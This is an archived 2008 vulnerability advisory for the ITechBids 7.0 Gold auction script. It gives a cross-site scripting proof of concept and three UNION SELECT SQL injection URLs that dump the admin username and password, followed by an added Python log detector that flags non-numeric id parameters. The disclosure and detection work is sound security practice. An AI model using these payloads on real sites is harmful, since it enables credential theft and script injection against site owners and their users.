itechbids-sqlxss.txt

2008-07-15T00:00:00
ID PACKETSTORM:68186
Type packetstorm
Reporter Encrypt3d.M!nd
Modified 2008-07-15T00:00:00

Description

  
################################ !R4Q!4N H4CK3R ###################################  
  
ITechBids 7.0 Gold Multiple Remote Vulnerabilities  
  
Website : http://www.itechscripts.com  
  
Found By : Encrypt3d.M!nd  
  
NOTE: I didn't search the script well, so maybe there are other vulnerabilities.  
  
  
# 1- Cross-site scripting (XSS):  
  
Affected File : forward_to_friend.php  
  
PoC :  
  
/forward_to_friend.php?productid=<script>alert(666);</script>  
  
  
# 2- Remote SQL Injection(s):  
  
Affected File(s) :  
  
sellers_othersitem.php  
classifieds.php  
shop.php  
  
Note: There are other files affected, but I couldn't exploit them :(  
  
PoC:  
  
/sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin  
  
/classifieds.php?productid=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin  
  
/shop.php?id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin  
  
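All four entry points above take what should be an integer identifier (productid, seller_id, id) and pass it through unfiltered, which is why both the XSS and the UNION SELECT payloads work. Until the script is patched, the quickest defensive signal is to watch the web server access log for those parameters carrying anything other than digits. The following detector is an added example written for this page; it is not part of the advisory or of the ITechBids code. It assumes Apache/nginx combined log format, uses the file and parameter names exactly as the advisory lists them, and the log lines it scans are constructed for the demonstration (the IPs are documentation addresses).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Entry points and the parameter names the advisory lists as injectable.
# Each parameter is a record identifier that should only ever be an integer.
NUMERIC_PARAMS = {
    "/forward_to_friend.php": {"productid"},
    "/sellers_othersitem.php": {"seller_id"},
    "/classifieds.php": {"productid"},
    "/shop.php": {"id"},
}

# Payload patterns, matched case-insensitively against the fully decoded value.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|['\"]|--|/\*", re.I | re.S)
XSS_RE = re.compile(r"<\s*/?\s*script|javascript\s*:|\bon\w+\s*=", re.I)

# Combined log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (not from any real server): one clean request per
# vulnerable file type, one SQL injection against seller_id, one XSS against productid.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jul/2008:10:01:02 +0000] "GET /shop.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jul/2008:10:01:09 +0000] "GET /sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5+from+admin HTTP/1.1" 200 7310 "-" "Mozilla/5.0"
198.51.100.4 - - [15/Jul/2008:10:02:15 +0000] "GET /forward_to_friend.php?productid=%3Cscript%3Ealert(666)%3B%3C/script%3E HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
198.51.100.4 - - [15/Jul/2008:10:02:30 +0000] "GET /classifieds.php?productid=17 HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""


def parse_log_line(line):
    """Split one combined-format log line into the fields we inspect, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "path": parts.path,
        # parse_qs percent-decodes and turns '+' into spaces, so a payload that was
        # URL-encoded in transit is inspected in the form the PHP script would see it.
        "params": parse_qs(parts.query, keep_blank_values=True),
    }


def classify_value(value):
    """Return why a value is suspicious, or None when it is the plain integer the script expects."""
    if value.strip().isdigit():
        return None
    if SQLI_RE.search(value):
        return "sql-injection"
    if XSS_RE.search(value):
        return "xss"
    # Anything else is still wrong for an id parameter and worth a low-severity alert.
    return "non-numeric-id"


def analyze_request(path, params):
    """Check every id-style parameter of a known entry point; return a list of findings."""
    findings = []
    for name in NUMERIC_PARAMS.get(path, ()):
        for value in params.get(name, []):
            label = classify_value(value)
            if label:
                findings.append({"path": path, "param": name, "label": label, "value": value})
    return findings


def scan_log(text):
    """Run the detector over a whole log; each finding carries the client IP, time and status."""
    findings = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        for f in analyze_request(rec["path"], rec["params"]):
            f.update(ip=rec["ip"], time=rec["time"], status=rec["status"])
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['label']:16} {f['path']} {f['param']}={f['value']!r}")
```

Because the check is "is this parameter an integer?" rather than a blocklist of payloads, it catches encoded variants and truncated probes alike; the SQLI/XSS labels only add severity on top of that. A status of 200 on a flagged request is the detail to look at first, since the advisory's PoCs return the admin credentials in a normally rendered page.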
  
# Greetz:  
  
MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,  
KoRn The Dog,Mini-Spider,All My Friends  
  
  
The EnD :D  
  